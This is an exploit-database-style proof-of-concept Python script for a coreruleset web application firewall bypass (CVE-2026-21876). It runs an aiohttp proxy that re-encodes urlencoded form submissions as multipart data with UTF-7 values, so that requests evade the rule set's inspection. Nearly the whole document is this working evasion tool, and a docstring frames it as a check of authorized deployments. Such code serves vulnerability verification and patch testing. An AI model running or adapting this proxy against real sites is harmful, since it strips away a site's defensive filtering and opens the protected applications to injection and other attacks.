# Exploit Title: coreruleset 4.21.0 - Firewall Bypass
# Date: 04/08/2026
# Exploit Author: Daytrift Newgen
# Vendor Homepage: https://github.com/coreruleset
# Software Link: https://github.com/coreruleset/coreruleset
# Version: < 4.22.0/3.3.8
# Tested on: Fedora, MacOS
# CVE : CVE-2026-21876
"""Proof-of-concept re-encoding proxy for CVE-2026-21876.

The script runs a small aiohttp server that forwards every request to
``UPSTREAM``. Requests whose body is ``application/x-www-form-urlencoded``
are rewritten as ``multipart/form-data`` with each value carried as UTF-7
text; every other request is forwarded with its body and Content-Type
unchanged. The upstream response is relayed back to the caller.

Intended for verifying that a deployment you are authorized to test has
been upgraded to a fixed rule-set release (see the Version field above).
"""

import base64
import os
from email.message import Message
from urllib.parse import parse_qsl

from aiohttp import ClientSession, MultipartWriter, web
from yarl import URL

# Target: base URL that requests are forwarded to (override via environment).
UPSTREAM = os.getenv("UPSTREAM", "http://host:8083")

# Headers that describe a single connection and are not relayed in either
# direction.
HOP_BY_HOP_HEADERS = {
    "connection",
    "keep-alive",
    "proxy-authenticate",
    "proxy-authorization",
    "te",
    "trailer",
    "transfer-encoding",
    "upgrade",
}

# Request headers that the outgoing client request sets itself: Host and
# Content-Length are recomputed, Content-Type is chosen in ``handle``.
_REGENERATED_REQUEST_HEADERS = {"host", "content-length", "content-type"}

_DEFAULT_CHARSET = "utf-8"


def _make_upstream_url(request):
    """Return the upstream URL with the same path and query as *request*."""
    base = URL(UPSTREAM)
    return str(
        base.with_path(request.rel_url.path).with_query(request.rel_url.query)
    )


def _copy_headers_for_upstream(request):
    """Return the request headers that may be forwarded upstream.

    Hop-by-hop headers, ``Host``, ``Content-Length`` and ``Content-Type``
    are left out; the caller is responsible for setting ``Content-Type``.
    """
    headers: dict[str, str] = {}
    for k, v in request.headers.items():
        lk = k.lower()
        if lk in HOP_BY_HOP_HEADERS or lk in _REGENERATED_REQUEST_HEADERS:
            continue
        headers[k] = v
    return headers


def _utf7_encode(text):
    """Return *text* as bytes, one ``+<base64>-`` UTF-7 unit per character.

    Each character is encoded as UTF-16-BE, base64-encoded with the ``=``
    padding removed, and wrapped in ``+`` / ``-``.
    """
    # join() instead of repeated ``+=`` keeps this linear in len(text).
    return b"".join(
        b"+" + base64.b64encode(char.encode("utf-16-be")).rstrip(b"=") + b"-"
        for char in text
    )


def _declared_charset(content_type):
    """Return the ``charset`` parameter of *content_type*, or UTF-8 if absent.

    Uses ``email.message`` because the ``cgi`` module (``parse_header``) was
    removed from the standard library in Python 3.13.
    """
    msg = Message()
    msg["Content-Type"] = content_type or ""
    return msg.get_content_charset(_DEFAULT_CHARSET)


def _form_urlencoded_to_multipart(body, content_type):
    """Convert a urlencoded form body into a multipart/form-data payload.

    Args:
        body: Raw request body bytes.
        content_type: The request's Content-Type header value; its
            ``charset`` parameter (default UTF-8) is used to decode *body*.

    Returns:
        A ``(writer, content_type)`` tuple: the ``MultipartWriter`` to send
        and the matching Content-Type header value (including boundary).
    """
    charset = _declared_charset(content_type)
    try:
        text = body.decode(charset, errors="replace")
    except (LookupError, ValueError):
        # The charset comes from the client; an unknown or non-text codec
        # must not turn into a 500, so fall back to the default.
        charset = _DEFAULT_CHARSET
        text = body.decode(charset, errors="replace")

    pairs = parse_qsl(
        text,
        keep_blank_values=True,
        strict_parsing=False,
        encoding=charset,
        errors="replace",
    )

    mp = MultipartWriter("form-data")
    for key, value in pairs:
        part = mp.append(_utf7_encode(value))
        part.headers["Content-Type"] = "text/plain; charset=utf-7"
        part.set_content_disposition("form-data", name=key)

    # A final fixed part declared as UTF-8 always closes the payload.
    part2 = mp.append("a".encode("utf-8"))
    part2.set_content_disposition("form-data", name="aBdC401")
    part2.headers["Content-Type"] = "text/plain; charset=utf-8"
    return mp, mp.content_type


async def handle(request):
    """Forward *request* to the upstream and relay the upstream response.

    Form-urlencoded bodies are converted with
    ``_form_urlencoded_to_multipart``; any other body is passed through
    unchanged together with its original Content-Type.
    """
    upstream_url = _make_upstream_url(request)
    headers = _copy_headers_for_upstream(request)

    content_type = request.headers.get("Content-Type", "")
    body = await request.read()
    data = body

    if content_type.startswith("application/x-www-form-urlencoded"):
        mp, mp_content_type = _form_urlencoded_to_multipart(body, content_type)
        data = mp
        headers["Content-Type"] = mp_content_type
    elif content_type:
        # _copy_headers_for_upstream drops Content-Type; restore it for
        # pass-through bodies so the upstream still sees the real media type.
        headers["Content-Type"] = content_type

    async with request.app["session"].request(
        method=request.method,
        url=upstream_url,
        headers=headers,
        data=data,
        allow_redirects=False,
        # proxy="http://127.0.0.1:8080",
    ) as resp:
        resp_body = await resp.read()
        # A list of pairs (not a dict) keeps repeated headers such as
        # multiple Set-Cookie lines.
        response_headers = [
            (k, v)
            for k, v in resp.headers.items()
            if k.lower() not in HOP_BY_HOP_HEADERS
        ]
        return web.Response(
            status=resp.status,
            headers=response_headers,
            body=resp_body,
        )


async def on_startup(app):
    """Create the shared client session used for upstream requests."""
    # auto_decompress=False: the upstream body is relayed byte-for-byte, so
    # the copied Content-Encoding / Content-Length headers stay accurate.
    app["session"] = ClientSession(auto_decompress=False)


async def on_cleanup(app):
    """Close the shared client session."""
    await app["session"].close()


app = web.Application(client_max_size=50 * 1024 * 1024)
app.router.add_route("*", "/{tail:.*}", handle)
app.on_startup.append(on_startup)
app.on_cleanup.append(on_cleanup)

if __name__ == "__main__":
    # Local proxy. NOTE: host "0.0.0.0" listens on every interface.
    web.run_app(app, host="0.0.0.0", port=8085)